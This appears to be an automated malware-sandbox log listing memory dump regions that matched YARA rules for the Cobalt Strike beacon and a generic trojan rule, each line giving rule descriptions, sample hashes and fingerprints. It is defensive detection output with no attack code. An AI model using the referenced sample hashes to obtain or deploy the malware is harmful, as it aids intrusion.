Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2008352809.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.3255937250.00000217D9E50000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2008825010.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
